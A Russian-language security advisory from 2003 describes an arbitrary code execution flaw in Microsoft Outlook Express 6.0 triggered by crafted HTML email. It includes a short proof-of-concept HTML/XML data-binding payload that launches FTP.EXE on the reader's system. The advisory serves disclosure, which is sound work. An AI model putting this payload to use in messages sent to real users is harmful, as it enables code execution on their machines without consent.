Выполнение произвольного кода в Microsoft Outlook Express

Дата публикации:
25.02.2003
Всего просмотров:
1034
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Microsoft Outlook Express. Удаленный пользователь может послать специально сформированное HTML почтовое сообщение или новость, чтобы выполнить произвольный код на системе пользователя.

Сообщается, что этот недостаток может быть связан с недостатком, первоначально описанным в MS02-015 и затрагивающим Internet Explorer. Однако обнаруженная уязвимость работает со всеми установленными заплатками от MS.

Пример (запускает FTP.exe на системе пользователя при попытке прочитать сообщение в Internet Zone" (не по умолчанию!):

<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile" 
classid="clsid:11111111-1111-1111-1111" 
codebase="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html 
dataSrc=#oExec></SPAN>
Уязвимость обнаружена в Microsoft Outlook Express 6.0

Ссылки: O UTLO OK EXP RE SS 6 .00 : broken
или введите имя

CAPTCHA